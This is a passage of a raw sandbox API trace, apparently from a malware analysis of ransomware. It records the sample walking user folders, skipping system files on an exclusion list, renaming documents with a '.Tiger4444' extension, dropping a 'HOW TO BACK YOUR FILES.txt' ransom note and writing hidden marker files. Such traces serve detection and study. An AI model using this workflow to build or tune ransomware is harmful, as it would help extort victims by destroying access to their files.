(HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0055.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0055.031] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14648430820) returned 1 [0055.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0055.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0055.031] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0055.049] CloseHandle (hObject=0x2cc) returned 1 [0055.049] CloseHandle (hObject=0x2b8) returned 1 [0055.049] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.Tiger4444") returned 114 [0055.049] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx.tiger4444"), dwFlags=0x1) returned 1 [0055.049] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334bde3, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x334bde3, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x584285c, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0055.049] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0055.049] lstrcpyW (in: lpString1=0x30aeb3e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0055.051] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0055.052] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0055.053] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.053] CloseHandle (hObject=0x2b8) returned 1 [0055.053] CloseHandle (hObject=0x2c4) returned 1 [0055.053] GetCurrentThreadId () returned 0xfa8 [0055.053] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0055.053] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto" [0055.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81f50 | out: hHeap=0xc50000) returned 1 [0055.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0055.053] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto" [0055.053] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\" [0055.053] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\.BFC0E91B00AE8A0620D3" [0055.053] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0055.054] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0055.056] FlushFileBuffers (hFile=0x2c4) returned 1 [0055.057] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.057] CloseHandle (hObject=0x2c4) returned 1 [0055.058] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto") returned 48 [0055.058] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789ca310, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x85d60146, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0055.058] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.058] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.058] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0055.058] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.058] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789ca310, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x85d60146, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.058] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.058] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.058] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0055.058] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.058] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.058] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x85d60146, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x85d60146, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x85d60146, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.058] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.059] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.059] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="Tiger4444.exe") returned -1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2=".") returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="..") returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="windows") returned -1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="bootmgr") returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="pagefile.sys") returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="boot") returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="ids.txt") returned 1 [0055.059] lstrcmpiW (lpString1="RSA", lpString2="NTUSER.DAT") returned 1 [0055.059] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="RSA" | out: lpString1="RSA") returned="RSA" [0055.059] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", dwFileAttributes=0x10) returned 1 [0055.059] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0055.059] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6a) returned 0xc89ba8 [0055.059] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc666c8 [0055.059] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0055.059] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0055.059] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.059] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0055.060] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0055.060] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0055.060] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.061] CloseHandle (hObject=0x2b8) returned 1 [0055.061] CloseHandle (hObject=0x2c4) returned 1 [0055.061] GetCurrentThreadId () returned 0xfa8 [0055.061] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0055.061] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0055.061] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0055.061] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0055.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0055.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0055.061] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.BFC0E91B00AE8A0620D3" [0055.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0055.062] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0055.064] FlushFileBuffers (hFile=0x2c4) returned 1 [0055.065] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.065] CloseHandle (hObject=0x2c4) returned 1 [0055.065] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 52 [0055.065] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.067] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x85d60146, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0055.067] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.067] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.067] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0055.067] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.067] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x85d60146, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.067] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.068] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.068] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0055.068] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.068] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.068] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x85d60146, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x85d60146, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x85d60146, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.068] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.068] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.068] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="Tiger4444.exe") returned -1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".") returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="..") returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="windows") returned -1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="bootmgr") returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="pagefile.sys") returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="boot") returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="ids.txt") returned 1 [0055.068] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="NTUSER.DAT") returned 1 [0055.068] lstrcpyW (in: lpString1=0x30aeb12, lpString2="S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="S-1-5-21-1051304884-625712362-2192934891-1000") returned="S-1-5-21-1051304884-625712362-2192934891-1000" [0055.068] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000", dwFileAttributes=0x10) returned 1 [0055.068] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66560 [0055.068] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc6) returned 0xc8d710 [0055.068] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66568 | out: ListHead=0xc66828, ListEntry=0xc66568) returned 0xc666c8 [0055.068] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789cc9c3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789cc9c3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0055.068] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0055.068] lstrcpyW (in: lpString1=0x30aeb12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.068] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0055.070] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0055.070] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0055.071] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.071] CloseHandle (hObject=0x2b8) returned 1 [0055.071] CloseHandle (hObject=0x2c4) returned 1 [0055.071] GetCurrentThreadId () returned 0xfa8 [0055.071] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66568 [0055.071] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000" [0055.071] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d710 | out: hHeap=0xc50000) returned 1 [0055.071] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66560 | out: hHeap=0xc50000) returned 1 [0055.071] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000" [0055.071] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\" [0055.071] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3" [0055.071] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1051304884-625712362-2192934891-1000\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0055.086] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0055.101] FlushFileBuffers (hFile=0x2c4) returned 1 [0055.104] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.104] CloseHandle (hObject=0x2c4) returned 1 [0055.104] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 98 [0055.104] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.105] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x30adf58 | 